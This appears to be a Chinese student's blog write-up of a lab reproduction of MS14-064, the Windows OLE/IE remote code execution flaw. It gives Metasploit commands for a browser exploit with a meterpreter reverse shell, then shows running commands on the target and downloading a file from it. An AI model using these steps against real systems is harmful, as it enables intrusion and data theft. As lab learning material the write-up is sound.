本博客最先发布于我的个人博客,如果方便,烦请移步恰醋的小屋查看,谢谢您!
这是我在实验室学习渗透测试的第五个漏洞复现,一个多小时便完成了。学长给的要求只需完成查看靶机信息、在指定位置创建文件夹两项操作,我在看别的博客时发现还可以利用该漏洞窃取文件,因此也自己尝试了以下,写在了博客的最后。
漏洞介绍
MS14-064为Windows OLE自动化阵列远程代码执行漏洞。当IE不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用IE浏览器查看该网站时允许远程执行代码。
受影响的产品有:
- Windows Server 2003
- Windows Server 2008
- Windows Server 2008 R2
- Windows Vista
- Windows XP
- Windows 7
- Windows 8
- Windows 8.1
- Windows Server 2012
- Windows Server 2012 R2
- Windows RT
- Windows RT 8.1
实验环境
攻击机:Kali Linux: 192.168.227.128
靶机:Windows Server 2008: 192.168.227.130
复现步骤
-
使用
msfconsole命令启动msf,搜索ms14-064的漏洞信息: -
使用第一个攻击模块,设置载荷
use exploit/windows/browser/ms14_064_ole_code_execution # 使用第一个攻击模块 show payloads # 查看有效的攻击载荷 set payload windows/meterpreter/reverse_tcp # 设置反弹连接shell之后使用
show options命令查看需要进行的设置。其中,AllowPowershellPrompt、SRVHOST和LHOST需要修改。AllowPowershellPrompt改为true,其余两个改为攻击机IP。设置完成后,使用exploit命令生成恶意网站。
-
使用靶机用IE浏览器打开生成的恶意链接
-
返回Kali,已经生成了一个连接session了,按一下回车,输入
sessions -i 1连接,入侵靶机,打开shell,如果乱码,则使用chcp 65001改变编码,然后输入whoami查看当前用户。(第一次失败了,我推断可能是修改了编码的原因,因为第二次打开shell后没有修改编码,发现成功了,之后又尝试了修改编码后输入whoami,依然不成功)
-
尝试在桌面上创建一个名为test的文件夹:
返回windows server 2008查看,桌面上已经出现了相应的文件夹:
-
尝试从靶机窃取文件
在桌面创建一个名为secret的文件夹:
使用dir命令查看,存在secret.txt文件,返回meterpreter,使用download命令下载文件:
下载完成后,在目标目录下查看,存在,说明窃取成功: